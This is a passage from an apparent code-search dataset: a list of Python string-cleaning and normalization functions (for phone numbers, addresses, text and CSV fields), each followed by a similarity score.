words like \"G-20\"\n matches = re.findall(r'^\\d+\\s+|\\s+\\d+\\s+|\\s+\\d+$', x)\n if len(matches) != 0:\n x = re.sub('^[0-9]{5,}\\s+|\\s+[0-9]{5,}\\s+|\\s+[0-9]{5,}$', ' ##### ', x)\n x = re.sub('^[0-9]{4}\\s+|\\s+[0-9]{4}\\s+|\\s+[0-9]{4}$', ' #### ', x)\n x = re.sub('^[0-9]{3}\\s+|\\s+[0-9]{3}\\s+|\\s+[0-9]{3}$', ' ### ', x)\n x = re.sub('^[0-9]{2}\\s+|\\s+[0-9]{2}\\s+|\\s+[0-9]{2}$', ' ## ', x)\n # we do include the range from 1 to 10 as all word-vectors include them\n # x = re.sub('[0-9]{1}', '#', x)\n\n return x", "def normalize_latin(raw_word):\n nfkd = unicodedata.normalize('NFKD', raw_word)\n lowercased = nfkd.lower()\n no_digits = DIGITS.sub('', lowercased)\n j_to_i = re.sub('j', 'i', no_digits)\n v_to_u = re.sub('v', 'u', j_to_i)\n return NONWORDS.sub('', v_to_u)", "def clean_phone(number_str):\n number_str = number_str or ''\n number_str = number_str.replace('(', '').replace(')', '')\n number_str = number_str.replace('ext. ', 'x').replace('ext ', 'x')\n number_str = number_str.split(',')[0].strip()\n\n if number_str:\n return number_str", "def clean(line):\n line = line.strip('\\n').strip()\n line = line.replace('\\xe2\\x80\\x93', '-')\n line = line.replace('\\xe2\\x80\\x99', '\\'')\n\n return line", "def sanitize_record_id(record):\n record.id = READ_INDEX_DIR_RE.sub(\"\", DUP_COLON_RE.sub(r\":\", record.id))", "def clean_line(line, normNum=True, normProf=True):\n\n # Remove square brackets, ceiling characters, question marks, other\n # questionable characters, and line breaks\n line = re.sub(r'(\\[|\\])', '', line)\n line = re.sub(r'(⌈|⌉)', '', line)\n line = re.sub(r'( / )', ' ', line)\n line = re.sub(r'/', '', line)\n line = re.sub(r'\\?', '', line)\n line = re.sub(r'([<]|[>])+', '', line)\n line = re.sub(r'!', '', line)\n line = re.sub(r'\"', '', line)\n\n # Remove researcher's notes, and multiple dashes or '='s\n line = re.sub(r'(\\(.*\\))', '', line)\n line = re.sub(r'(#[.]*)', '', line)\n line = re.sub(r'[-]{2}', '', line)\n line = re.sub(r'[=]{2}', '', line)\n\n # Replace numbers with 'number'\n if normNum is True:\n line = re.sub(r'\\b(?<!-)(\\d+)(?![\\w-])', 'number', line)\n line = re.sub(r'[-+]?\\b\\d+\\b', 'number', line)\n\n #line = re.sub(r'\\b([\\-\\.0-9]+)(?![\\w-])', 'number', line)\n\n # Replace professions with 'profession'\n if normProf is True:\n line = professions.replaceProfessions(line)\n\n # Remove blank character at end of line\n linelength = len(line)\n if (linelength > 0 and line[linelength-1] == \"\"):\n del line[0:linelength-2]\n\n return line", "def shorten_id(id):\n if id.startswith('CN'):\n id = id[2:]\n if not id[-1].isdigit():\n id = id[:-1]\n return id", "def clean_mysteries(self, item):\n if \"[???]\" in item['name']:\n item['name'] = item['name'][6:]", "def normalize(self):\n normalized = self.all_details.get('normalized', '')\n if normalized:\n return normalized\n\n if self.is_digit():\n self.all_details['normalized'] = 'Numeric'\n elif self.is_uuid():\n self.all_details['normalized'] = 'UUID'\n elif self.is_gibberish():\n self.all_details['normalized'] = 'Gibberish'\n else:\n for nr in self.normalized_regex_list:\n regex = nr['regex']\n groups = r'{}'.format(nr['groups'])\n ua = regex.sub(groups, self.user_agent)\n if ua != self.user_agent:\n self.all_details['normalized'] = ua\n break\n else:\n self.all_details['normalized'] = ''\n\n return self.all_details['normalized']", "def clean_abbreviations(x):\n # a few entries in Revenue were nan\n if pd.isnull(x):\n return np.nan\n elif 'K' in x:\n return int(float(x[:-1]) * 1e3)\n elif 'M' 
in x:\n return int(float(x[:-1]) * 1e6)\n elif 'B' in x:\n return int(float(x[:-1]) * 1e9)\n else:\n return int(x)", "def compact(number):\n number = clean(number, ' ').upper().strip()\n if number.startswith('AL'):\n number = number[2:]\n if number.startswith('(AL)'):\n number = number[4:]\n return number", "def sanitize_input(term: str) -> str:\n return term.strip().replace(\"*\", \"\").replace(\"'\", \"\\\\'\").replace(\"~\", \"\")", "def clean_address(self, s):\n # The letter \"O\" instead of the numeral \"0\" is a common mistake.\n s = re.sub(\n r\"\\b[A-Z][O0-9][A-Z]\\s?[O0-9][A-Z][O0-9]\\b\", lambda x: x.group(0).replace(\"O\", \"0\"), clean_string(s)\n )\n for k, v in province_or_territory_abbreviations().items():\n # Replace a province/territory name with its abbreviation.\n s = re.sub(\n r\"[,\\n ]+\"\n r\"\\(?\" + k + r\"\\)?\"\n r\"(?=(?:[,\\n ]+Canada)?(?:[,\\n ]+[A-Z][0-9][A-Z]\\s?[0-9][A-Z][0-9])?\\Z)\",\n \" \" + v,\n s,\n )\n # Add spaces between province/territory abbreviation, FSA and LDU and remove \"Canada\".\n return re.sub(\n r\"[,\\n ]+\" r\"([A-Z]{2})\" r\"(?:[,\\n ]+Canada)?\" r\"[,\\n ]+([A-Z][0-9][A-Z])\\s?([0-9][A-Z][0-9])\" r\"\\Z\",\n r\" \\1 \\2 \\3\",\n s,\n )", "def strip(self):\n self.document_type = self.document_type.strip()\n self.document_reg_id = self.document_reg_id.strip()\n self.owner_cross_reference = self.owner_cross_reference.strip()\n self.routing_slip_number = self.routing_slip_number.strip()\n self.bcol_account = self.bcol_account.strip()\n self.dat_number = self.dat_number.strip()\n self.examiner_id = self.examiner_id.strip()\n self.update_id = self.update_id.strip()\n self.phone_number = self.phone_number.strip()\n self.attention_reference = self.attention_reference.strip()\n self.name = self.name.strip()\n self.legacy_address = self.legacy_address.strip()\n self.consideration_value = self.consideration_value.strip()\n self.affirm_by_name = self.affirm_by_name.strip()\n self.liens_with_consent = self.liens_with_consent.strip()\n self.client_reference_id = self.client_reference_id.strip()\n self.own_land = self.own_land.strip()", "def clean_data(data):\n \n cols = data.columns\n \n #these columns had some extra characters in the strings becuase of encoding issues\n list_to_strip=[\n 'attributes_alcohol',\n 'attributes_restaurantsattire',\n 'attributes_wifi',\n 'attributes_smoking',\n 'attributes_noiselevel',\n ]\n #this removes quotation marks and u's from strings\n \n for col in list_to_strip:\n data[col]=data[col].str.strip(\"u\\'\")\n \n #this replaces the strings None and none with Nan objects\n for col in cols:\n data[col]=data[col].where(data[col]!='None')\n data[col]=data[col].where(data[col]!='none')\n \n #this creates a list of categorical and numerical features\n categorical_features = cols.drop([\n 'review_count',\n 'restaurant',\n 'latitude',\n 'longitude',\n 'business_id',\n 'meanfunny',\n 'meanuseful',\n 'avgwordcount',\n 'maxwordcount',\n 'minwordcount',\n 'avgfunnywordcount',\n 'maxfunnywordcount',\n 'avgusefulwordcount',\n 'maxusefulwordcount',\n 'medianwordcount',\n 'upperquartilewordcount',\n 'lowerquartilewordcount',\n 'target'])\n \n \n numerical_features = [\n 'review_count',\n 'latitude',\n 'longitude',\n 'meanfunny',\n 'meanuseful',\n 'avgwordcount',\n 'maxwordcount',\n 'minwordcount',\n 'avgfunnywordcount',\n 'maxfunnywordcount',\n 'avgusefulwordcount',\n 'maxusefulwordcount',\n 'medianwordcount',\n 'upperquartilewordcount',\n 'lowerquartilewordcount']\n \n #this replaces the categorial nans with 9 as a placeholder 
and fills numerical nans with 0\n data[categorical_features]=data[categorical_features].fillna(9)\n data[numerical_features]=data[numerical_features].fillna(0)\n \n #this makes all the categorical columns strings\n data[categorical_features]=data[categorical_features].astype(str)\n data = data\n \n return data, numerical_features, categorical_features", "def extract_valid_species_name(self, taxon):\n\n if ' bacterium' in taxon.lower() or 'sp.' in taxon.lower():\n return None\n\n taxon = taxon.replace('s__', '')\n taxon = taxon.replace('Candidatus', '')\n taxon = taxon.replace('candidatus', '')\n\n if not taxon or taxon[0].islower():\n return None\n\n taxon_split = taxon.split(' ')\n if len(taxon_split) < 2:\n return None\n\n # sanity check\n taxon = 's__' + ' '.join(taxon_split[0:2])\n self.validate_species_name(taxon)\n\n return taxon", "def clean_identifier(self, identifier):\n if isinstance(identifier, list):\n return '%2F'.join(identifier)\n else:\n return identifier", "def __cleanText(self,stripNonAlphaNumeric=False, stripNumbers=False):\n if stripNonAlphaNumeric:\n txt = r1.sub(\" \",self.getRawText() )\n else:\n txt = self.getRawText()\n # clean up white spaces\n txt = r2.sub(\" \",txt)\n if stripNumbers:\n txt = r3.sub(\"\",txt)\n self.graph[\"__txt\"] = txt\n self.graph[\"__scope\"] = (0,len(txt))", "def remove_bad_characters(self):\n\n self.categorie_name = self.categorie_name.replace(\"\\n\", \"\")", "def sanitize_ean13(ean13):\n if not ean13:\n return \"0000000000000\"\n ean13 = re.sub(\"[A-Za-z]\",\"0\",ean13);\n ean13 = re.sub(\"[^0-9]\",\"\",ean13);\n ean13 = ean13[:13]\n if len(ean13) < 13:\n ean13 = ean13 + '0' * (13-len(ean13))\n return ean13[:-1] + str(ean_checksum(ean13))", "def _clean_non_alphanumeric_chars(self):\n\n for i,variable in enumerate(self.model_description.modelVariables):\n clean_name = re.sub(r'[^a-zA-Z0-9_]', '', variable.name)\n if clean_name != variable.name:\n log = \"Sim variable '{}' has been renamed to '{}' \".format(variable.name, clean_name)\n log += \"to comply with Bonsai naming requirements.\"\n print(log)\n self.model_description.modelVariables[i].name = clean_name\n\n return", "def clean_text_from_geometrical_shape_unicode(line):\n line = re.sub(r\"([\\u25A0-\\u25FF])\", \" \", line)\n return line", "def clean_text_from_geometrical_shape_unicode(line):\n line = re.sub(r\"([\\u25A0-\\u25FF])\", \" \", line)\n return line", "def clean_venue(venue):\n\n return venue.lower().strip('?:!.,;- ')", "def tweet_clean_numbers(word):\n if not re.search(r'[0-9]+', word):\n return word\n if len(word)==4 and re.search(r'[0-9]{4}', word) and 1900 < int(word) < 2019:\n return word\n word = re.sub(r'^([0-9]|[\\+\\-%/\\*\\.:])+[0-9%/\\+\\*\\.x:]*$', '<number>', word)\n return word", "def normalizeSerial(serial):\n\treturn serial.upper().replace(\"-\", \"\").strip()", "def clean_weather_df(weather_df):\n col = weather_df.columns\n drop_col = list(col[7::2])\n clean_num = weather_df[weather_df['LATITUDE'].str.contains(\n \"LATITUDE\") == False]\n num_weather = clean_num.drop(drop_col, axis=1)\n just_num = num_weather.drop(['NAME', 'STATION'], axis=1)\n all_weatherdf = just_num.apply(pd.to_numeric)\n all_weatherdf['name'] = num_weather['NAME']\n return all_weatherdf", "def clean_ys(y):\n\n for i, chord in enumerate(y):\n if not len(chord) == 1:\n chord = chord.split(':')\n tonality = re.sub(r'[0-9/]+', '', chord[0])\n flavor = chord[-1]\n if \"min\" in flavor:\n y[i] = tonality + ' min'\n else:\n y[i] = tonality\n return y", "def clean_rn(rn):\n\treturn 
rn.strip().replace('\\n', '').replace('\\r', '').strip()", "def remove_prep_from_obj(objt):\n objt['initial_value'] = \" \".join(objt['initial_value'].split(\" \")[1:])\n objt['replacement_value'] = \" \".join(objt['replacement_value'].split(\" \")[1:])\n return objt", "def removeNumbers(self, words):\n\t\treturn re.sub(r'\\d', '', words)", "def _remove_digits(self, text: str) -> str:\n return re.sub(r\"\\d+\", \" \", str(text))", "def dummy_junction13():\n return 'junction:chr1:176-299:+'", "def normalize(self, s):\n s = normalizing_regexp.sub('_', s)\n if s[0:1] in string.digits:\n s = '_' + s\n return s", "def dummy_junction14():\n return \"junction:chr1:176-324:+\"", "def _entity_skill_id(skill_id):\n skill_id = skill_id[:-1]\n skill_id = skill_id.replace('.', '_')\n skill_id = skill_id.replace('-', '_')\n return skill_id", "def cleanData(rawData):\n\trawData = re.sub(r'R-LRB- \\(', r'R-LRB- -LRB-', rawData)\n\trawData = re.sub(r'R-RRB- \\)', r'R-RRB- -RRB-', rawData)\n\trawData = re.sub(r'R-RRB- \\(', r'R-RRB- -LRB-', rawData)\n\trawData = re.sub(r'-LRB- \\(', r'-LRB- -LRB-', rawData)\n\trawData = re.sub(r'-RRB- \\)', r'-RRB- -RRB-', rawData)\n\trawData = re.sub(r'PU \\(', r'PU -LRB-', rawData)\n\trawData = re.sub(r'PU \\)', r'PU -RRB-', rawData)\n\trawData = re.sub(r':-\\)', r'smileyface', rawData)\n\n\treturn rawData", "def clean_isbn(isbn):\n digits = set(\"0123456789\")\n return [int(x if x in digits else 10) for x in isbn.translate(None, \" -\")]", "def tidy_address(address):\n address = address.lstrip('$,')\n address = address.rstrip('$,')\n address = re.sub(r'\\$US$', '', address)\n return address", "def strip_phone_prefix(self, phone_num):\n # FIXME more accurate check\n if phone_num.startswith('+86'):\n return phone_num.replace('+86', '')\n if len(phone_num) != 11:\n return None\n return phone_num", "def remove_extra_characters(self, text):\n if text:\n parsed_text = text\n parsed_text = parsed_text.replace(\"[\", \"\")\n parsed_text = parsed_text.replace(\"]\", \"\")\n parsed_text = parsed_text.replace(\"{\", \"\")\n parsed_text = parsed_text.replace(\"}\", \"\")\n parsed_text = parsed_text.replace(\"|\", \" \")\n parsed_text = parsed_text.replace(\"-\", \"\")\n parsed_text = parsed_text.replace(\"&nbsp;\", \"\")\n parsed_text = parsed_text.replace(\":'\", \"\")\n parsed_text = parsed_text.replace(\"'\", \"\")\n parsed_text = parsed_text.replace(\"#\", \"\")\n parsed_text = parsed_text.replace(\"':\", \"\")\n parsed_text = parsed_text.replace(\"=\", \"\")\n parsed_text = parsed_text.replace(\"*\", \"\")\n parsed_text = parsed_text.replace(\"/\", \"\")\n parsed_text = parsed_text.replace(\"<--\", \"\")\n parsed_text = parsed_text.replace(\"-->\", \"\")\n parsed_text = parsed_text.replace(\"<!--\", \"\")\n parsed_text = parsed_text.replace(\">\", \"\")\n parsed_text = parsed_text.replace(\"<\", \"\")\n\n parsed_text = parsed_text.replace('__NOTOC__', '')\n\n return parsed_text", "def clean_posiResNums(self) -> None:\n position_copy = self.POSITION\n pos = position_copy.content\n tmpN = \"\"\n tmpID = 0\n tmpOldID = pos[0].resID\n\n for p in pos:\n # print(p)\n # print(tmpN,tmpID)\n if p.resName == tmpN and p.resID == tmpOldID: # same residue as before\n p.resID = tmpID\n elif (\n p.resName == tmpN and p.resID != tmpOldID): # same resiname but diff ID (double? 
- this is a problem!)\n tmpOldID = p.resID\n tmpID += 1\n p.resID = tmpID\n else: # next name and residue id\n tmpID += 1\n tmpN = p.resName\n tmpOldID = p.resID\n p.resID = tmpID\n\n self.POSITION.content = pos", "def strip_other_charcter():\n pass", "def remove_digits(self, text):\n return re.sub('\\d+', '', text)", "def basic_cleaning2(string):\n\n string = string.lower()\n string = re.sub('[0-9\\(\\)\\!\\^\\%\\$\\'\\\"\\.;,-\\?\\{\\}\\[\\]\\\\/]', ' ', string)\n string = re.sub(' +', ' ', string)\n return string", "def strip_non_num(phone):\n return ''.join([i for i in phone if i.isdigit()])", "def compact(number):\n number = clean(number, ' ').upper().strip()\n for prefix in ('УНП', u'УНП', 'UNP', u'UNP'):\n if type(number) == type(prefix) and number.startswith(prefix):\n number = number[len(prefix):]\n # Replace Cyrillic letters with Latin letters\n cleaned = ''.join(_cyrillic_to_latin.get(x, x) for x in to_unicode(number))\n if type(cleaned) != type(number): # pragma: no cover (Python2 only)\n cleaned = cleaned.encode('utf-8')\n return cleaned", "def _remove_digits(text: str) -> str:\n table = str.maketrans('', '', digits)\n\n return text.translate(table)", "def normalize(sent):\n sent = re.sub(r'(?:@[\\w_]+)', \"user\", sent)\n sent = re.sub(r'http[s]?://(?:[a-z]|[0-9]|[$-_@.&amp;+]|[!*\\(\\),]|(?:%[0-9a-f][0-9a-f]))+', \"url\", sent)\n #sent = re.sub(r\"(?:\\#+[\\w_]+[\\w\\'_\\-]*[\\w_]+)\", \"hashtag\", sent)\n sent = ReplaceThreeOrMore(sent)\n sent = remove_unicode_diac(sent)\n sent = sent.replace('_', ' ')\n return sent", "def clean_data(td):\n data = td.string\n try:\n return data.strip(\" \\n:-\")\n except AttributeError:\n return u\"\"", "def clean_note_prefix(self):\n data = self.cleaned_data[\"note_prefix\"]\n return data.encode(\"ascii\") if data != \"\" else data", "def clean_values(values_to_clean: np.ndarray):\n char_rem = \"!@#$%^*()[]{};:.,/<>?|`~-=_+'\\\\\"\n for j in range(values_to_clean.shape[0]):\n for k in range(2, 4):\n for c in char_rem:\n values_to_clean[j, k] = re.sub(' +', ' ', values_to_clean[j, k].replace(c, \" \").strip())\n return values_to_clean", "def _strip_invalid_characters(self: object) -> None:\n for current_invalid_character in Episode._invalid_characters:\n self.episode_broadcast = self.episode_broadcast.replace(current_invalid_character, \" \").strip()\n self.episode_inspectors = self.episode_inspectors.replace(current_invalid_character, \" \").strip()\n self.episode_name = self.episode_name.replace(current_invalid_character, \" \").strip()\n self.episode_sequence = self.episode_sequence.replace(current_invalid_character, \"-\").strip()", "def remove_nums(self, text):\r\n return text.translate(None, digits)", "def remove_nums(self, text):\r\n return text.translate(None, digits)", "def remove_nums(self, text):\r\n return text.translate(None, digits)", "def _cleanupAddress(self, address):\n clean = []\n \n # This is sort of a desultory effort but I'm not convinced \n # that these cleanups will actually result in cleaner searches\n for word in address.split(None):\n lower = word.lower()\n \n # Some things we just nuke\n if lower == 'at': continue\n elif lower == 'btw': continue\n elif lower == 'btwn': continue\n elif word.isdigit(): continue\n \n # Or we make substitiutions\n elif lower == 'st' or lower == 'st.':\n word = 'Street'\n elif lower == 'ave' or lower == 'ave.':\n word = 'Avenue'\n elif lower == 'pl' or lower == 'pl.':\n word = 'Place'\n elif lower == 'n': word = 'North'\n elif lower == 'e': word = 'East'\n elif lower == 's': word = 
'South'\n elif lower == 'w': word = 'West'\n \n clean.append(word)\n return ' '.join(clean)", "def _chop_end_misc(line):\n return re.sub(r\"\\s+\\d\\d-\\w\\w\\w-\\d\\d\\s+[1-9][0-9A-Z]{3}\\s*\\Z\", \"\", line)", "def dummy_junction34():\n return 'junction:chr1:351-399:+'", "def test_address__normalize_phone_number__5():\n assert '01234567891' == normalize_phone_number('01234/5678-91', '')", "def phoneNumberExtractor(self,data):\n\t\tdata = data.replace(\"\\r\", \" \")\n\t\tdata = data.replace(\"\\r\\n\", \" \")\n\n\t\t#first is identifying 10 digits code\n\t\tdata = data.split()\n\t\tresult = []\n\t\tfor word in data:\n\t\t\tres = None\n\t\t\tres = word if word.isdecimal() and len(word) == 10 and not res else res\n\t\t\tres = word[2:] if word.isdecimal() and len(word) == 12 and not res else res\n\t\t\tres = word[3:] if word[3:].isdecimal() and len(word) == 10 and not res else res\n\t\t\tif (\"(\" and \")\") in word or \"-\" in word:\n\t\t\t\tword = word.replace(\"(\",\"\")\n\t\t\t\tword = word.replace(\")\",\"\")\n\t\t\t\tword = word.replace (\"-\",\"\")\n\t\t\t\tres = word if(len(word) == 10) else None\n\t\t\tif res:\n\t\t\t\tresult.append(res)\n\t\t\t\tdel(res)\n\t\treturn set(result)", "def sanitize_key(key):\n return re.sub('\\W|^(?=\\d)','_', key)", "def test_address__normalize_phone_number__7():\n assert '+421234007891' == normalize_phone_number(\n '0042-1234/0078-91', '+49')" ]
[ "0.617545", "0.59764254", "0.5974559", "0.58157676", "0.57999325", "0.57070196", "0.56774664", "0.5623333", "0.56135535", "0.55448365", "0.5531851", "0.5499692", "0.54500884", "0.54454935", "0.5440887", "0.5432032", "0.54141355", "0.5411208", "0.54100305", "0.53966856", "0.53705513", "0.53509486", "0.5347722", "0.5342722", "0.53245085", "0.5305887", "0.53037786", "0.5303514", "0.5302226", "0.52968335", "0.52929324", "0.5289402", "0.52836335", "0.5244402", "0.5244222", "0.5227969", "0.5219317", "0.5216829", "0.5206958", "0.5201648", "0.5191715", "0.51908326", "0.5181376", "0.51750755", "0.51729584", "0.5169187", "0.51578754", "0.5156093", "0.5154104", "0.5148885", "0.514559", "0.51372844", "0.51358384", "0.5125866", "0.5098999", "0.5098197", "0.50847644", "0.5076807", "0.5073669", "0.5073669", "0.5068347", "0.5065133", "0.50516987", "0.50493765", "0.50389045", "0.5035547", "0.5026138", "0.5025726", "0.501843", "0.5018155", "0.50097835", "0.5005653", "0.49896538", "0.49864098", "0.49838752", "0.49813983", "0.49725696", "0.49712414", "0.49640462", "0.496314", "0.49598193", "0.49576965", "0.495636", "0.49543518", "0.49513298", "0.4950538", "0.49434543", "0.4940075", "0.49386284", "0.4933374", "0.49313065", "0.49313065", "0.49313065", "0.49298126", "0.4927804", "0.4926903", "0.4925628", "0.49064586", "0.49060035", "0.49057376" ]
0.5550276
9
Take a field from the CSV and expand/split it on a delimiter and return a list of individual values. If the return_list flag is set to true, then this method will return the data back as a list of new fields instead of a cleaned-up string normalized with a semicolon delimiter
def expand_and_normalize_field(field, return_list=False):
    if isinstance(field, basestring):
        field = field.rstrip(';:,')
        data = [_normalize_expanded_field(r) for r in re.split(",|;|:", field)]
        if return_list:
            return data
        else:
            return ";".join(data)
    else:
        if return_list:
            return [field]
        else:
            return field
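A minimal usage sketch for the document function above (not part of the dataset record): it ports the Python 2 basestring check to str and substitutes a hypothetical _normalize_expanded_field that only trims whitespace, since the real helper is not shown here.

import re

def _normalize_expanded_field(value):
    # hypothetical stand-in for the real helper: just trim surrounding whitespace
    return value.strip()

def expand_and_normalize_field(field, return_list=False):
    # Python 3 port of the document function above (str instead of basestring)
    if isinstance(field, str):
        field = field.rstrip(';:,')
        data = [_normalize_expanded_field(r) for r in re.split(",|;|:", field)]
        return data if return_list else ";".join(data)
    return [field] if return_list else field

print(expand_and_normalize_field("a; b, c:"))                    # -> "a;b;c"
print(expand_and_normalize_field("a; b, c:", return_list=True))  # -> ['a', 'b', 'c']
print(expand_and_normalize_field(42, return_list=True))          # -> [42]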
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def csv_line(value_parser):\n def convert(string):\n return list(map(value_parser, string.split(',')))\n return convert", "def parse_and_flatten(df, field_name):\n\n # Parse and flatten the list\n lst = list(df[field_name])\n lst = [x.split('|') for x in lst]\n\n lst_flat = []\n for slist in lst:\n for x in slist:\n lst_flat.append(x)\n return lst_flat", "def from_csv_line(line):\r\n return line.strip().split(',')", "def parse_csv_option(option):\n if option:\n return option.split(',')\n else:\n return []", "def parse_csv_option(option):\n if option:\n return option.split(',')\n else:\n return []", "def _parsecsv(x):\n for line in x:\n # decode as utf-8, whitespace-strip and split on delimiter\n yield line.decode('utf-8').strip().split(config.DELIMITER)", "def map_field_value(\n row: DLCSRecord, field_name: str, config: typing.Dict\n) -> typing.Any:\n mapping: mapper.MappigDictValue = mapper.FIELD_MAPPING[field_name]\n\n if mapping is None:\n return None\n\n if callable(mapping):\n return mapping(row)\n\n if isinstance(mapping, str):\n mapping = [mapping]\n\n if not isinstance(mapping, typing.Collection):\n raise TypeError(\n f\"FIELD_MAPPING[field_name] must be iterable, unless it is None, Callable, or a string.\"\n )\n\n output: typing.List[str] = []\n for csv_field in mapping:\n input_value = row.get(csv_field)\n if input_value:\n if isinstance(input_value, str):\n output.extend(input_value.split(\"|~|\"))\n else:\n output.append(input_value)\n\n bare_field_name = get_bare_field_name(field_name)\n if bare_field_name in config.get(\"controlled_fields\", {}):\n terms = config[\"controlled_fields\"][bare_field_name][\"terms\"]\n output = [terms.get(value, value) for value in output]\n\n return [value for value in output if value] # remove untruthy values like ''", "def parse_csv2list_upload(file_name):\n with open(file_name) as f:\n records = csv.reader(f)\n csv_list = [[j.strip() for j in record] for record in records]\n return csv_list", "def __obtain_data_from_csv__(self, csvfile):\n data = csvfile.readlines()\n data = self.__parse_string_for_delimiter__(data)\n return data", "def __parse_string_for_delimiter__(self, data):\n parsed = []\n for row in data:\n row = self.__remove_break_line__(row)\n row = self.__split_for_delimiter__(row)\n parsed.append(row)\n return parsed", "def csv_reader(self, file_obj):\n reader = csv.reader(file_obj)\n for row in reader:\n row_1 = (' '.join(row))\n self.data.append(row_1.split(';'))\n return self.data", "def _read_delimited_field(d):\n val = []\n val.append(next(d))\n while val[-1] != FIELD_DELIMITER:\n try:\n val.append(next(d))\n except StopIteration: break\n\n modlogger.debug( \"read:%s\"%val[:-1])\n return field_ctor(val[:-1])", "def getcsv(self, section, option):\n elements = self.get(section, option)\n splitter = ',' if ',' in elements else None\n return [element.strip() for element in elements.split(splitter)]", "def listparse(csvfilename):\r\n output = []\r\n with open(csvfilename, 'r', newline = '') as csvfile:\r\n csvreader = csv.reader(csvfile, skipinitialspace = True)\r\n for row in csvreader:\r\n output.append(row)\r\n return output", "def process_data(line):\n wire_path_data = []\n for i in line:\n wire_path_data.append(i.strip('\\n').split(','))\n return wire_path_data", "def aslist(value, flatten=True):\n values = aslist_cronly(value)\n if not flatten:\n return values\n result = []\n for value in values:\n subvalues = value.split()\n result.extend(subvalues)\n return result", "def _splitFieldValue(self, line):\n found = 
self.FIELDVALUE.findall(line)\n if found:\n fieldName, value = found[0]\n if fieldName in self.C.ADAPTER_COMMAFIELDS:\n value = self.COMMASPLIT.findall(value)[:-1] # Split and remove last empty part\n return fieldName, value\n return None, None # No field name match on this line.", "def list_process(field, item_list:List[str]):\n # if isinstance(item_list, list):\n if len(item_list) == 0:\n return {\n\n }\n saved_list = []\n\n for i in item_list:\n saved_list.append(f\"{i}\")\n return {\n field: \",\".join(saved_list)\n }", "def line_to_list(self, _line):\n\n\t\tresult = list()\t\t\n\t\t_line_splited = _line.split('\\t')\n\t\t\n\t\tfor value in _line_splited:\n\t\t\tvalue_stripped = value.strip().rstrip()\t\t\t\n\t\t\tresult.append(value_stripped)\t\t\t\t\n\t\t\n\t\treturn result", "def __parseCsvRow(row):\r\n \r\n resultRow = []\r\n for item in row:\r\n if type(item) is str:\r\n if \".\" in item:\r\n try:\r\n f = float(item)\r\n resultRow.append(f)\r\n except ValueError:\r\n resultRow.append(item)\r\n else:\r\n try:\r\n i = int(item)\r\n resultRow.append(i)\r\n except ValueError:\r\n resultRow.append(item)\r\n else:\r\n resultRow.append(item)\r\n return resultRow", "def _parse_list(string, dtype=int, delimiter=','):\n\n items = string.lower().strip().replace(' ', '').split(delimiter)\n\n if 'none' in items:\n items.pop(items.index('none'))\n contains_none = True\n else:\n contains_none = False\n\n\n if dtype == bool:\n items = [item == 'true' for item in items]\n else:\n items = [dtype(item) for item in items]\n\n if contains_none:\n items.append(None)\n\n return items", "def lineToList(self, line):\n l = [item for item in next(csv.reader(StringIO.StringIO(line), self.CSVDialect))]\n if self.firstLine is None:\n self.firstLine = l\n return None\n return l", "def csv_to_field_Urls(entity, value):\n if value is None or value == '':\n return\n splitter = re.compile(url_splitter)\n entity.string = splitter.split(value)", "def getlist(self, option, sep=',', chars=None):\n return [chunk.strip(chars) for chunk in option.split(sep)]", "def split_field_content(cls, string):\n if \",\" in string and not is_rfc1123_datetime(string):\n return [s.strip() for s in string.split(\",\")]\n else:\n return string", "def transform(self):\n with open(self.csv_path, \"r\") as f:\n csv_entries = [{k: v for k, v in row.items()} for row in csv.DictReader(f, skipinitialspace=True)]\n\n nested_fields = get_nested_fieldnames(csv_entries[0])\n # values of these fields should be transformed to a list\n # list_fields = set()\n # for entry in csv_entries:\n # for k, v in entry.items():\n # if '||' in v:\n # list_fields.add(k)\n list_fields = {\n \"BITSTREAM Download URL\",\n \"BITSTREAM License\",\n \"BITSTREAM Webshop URL\",\n \"dc.contributor\",\n \"dc.contributor.author\",\n \"dc.contributor.editor\",\n \"dc.date.available\",\n \"dc.date.accessioned\",\n \"dc.date.issued\",\n \"dc.date.submitted\",\n \"dc.dateSubmitted\",\n \"dc.description.abstract\",\n \"dc.description.provenance\",\n \"dc.grantproject\",\n \"dc.identifier\",\n \"dc.identifier.pr\",\n \"dc.language\",\n \"dc.notes\",\n \"dc.number\",\n \"dc.redirect\",\n \"dc.relation.ispartofseries\",\n \"dc.relationisFundedBy\",\n \"dc.subject\",\n \"dc.subject.classification\",\n \"dc.subject.other\",\n \"dc.title\",\n \"dc.title.alternative\",\n \"dc.type\",\n \"oapen.collection\",\n \"oapen.grant.number\",\n \"oapen.grant.program\",\n \"oapen.imprint\",\n \"oapen.relation.hasChapter\",\n \"oapen.relation.hasChapter_dc.title\",\n 
\"oapen.relation.isFundedBy\",\n \"oapen.relation.isFundedBy_grantor.name\",\n \"oapen.relation.isPartOfBook\",\n \"oapen.relation.isPartOfBook_dc.title\",\n \"oapen.relation.isPublishedBy_publisher.name\",\n \"oapen.relation.isPublisherOf\",\n \"oapen.relation.isbn\",\n \"oapen.remark.public\",\n \"peerreview.anonymity\",\n \"peerreview.id\",\n \"peerreview.open.review\",\n \"peerreview.publish.responsibility\",\n \"peerreview.review.decision\",\n \"peerreview.review.stage\",\n \"peerreview.review.type\",\n \"peerreview.reviewer.type\",\n }\n # add custom 'dc.subject.classification_code'\n list_fields.add(\"dc.subject.classification_code\")\n entries = transform_dict(csv_entries, convert, nested_fields, list_fields)\n\n # Transform release into JSON Lines format saving in memory buffer\n # Save in memory buffer to gzipped file\n list_to_jsonl_gz(self.transform_path, entries)", "def extractFields(deerfootRDDRecord):\n fieldsList = deerfootRDDRecord.split(\",\")\n return (fieldsList[0], [fieldsList[1], fieldsList[15], fieldsList[46]])", "def get_list(section, option, default):\n\tres = get(section, option, default)\n\n\tif res == default:\n\t\treturn default\n\n\tl = unescape_split(\",\", res)\n\n\tif not l:\n\t\treturn default\n\treturn list(l)", "def line_split(self, line):\n\t\tline = re.sub(r\"`(.*?)'\", quote_replace, line)\n\t\tline = line.translate(None, '.:,()+*')\n\t\treturn line.split()", "def listify(item, delimiter=\",\"):\n if not item:\n return []\n if type(item) is str:\n item = item.split(delimiter)\n if type(item) is not list:\n raise TypeError(\"'listify' must take None, str, or list!\")\n return item", "def csv_to_list(csv_file, delimiter=','):\n with open(csv_file, 'r') as csv_con:\n reader = csv.reader(csv_con, delimiter=delimiter)\n return list(reader)", "def __obtain_csv_fieldnames__(self, csvfile):\n self.__fieldnames__ = csvfile.readline()\n self.__obtain_csv_delimiter__(self.__fieldnames__)\n 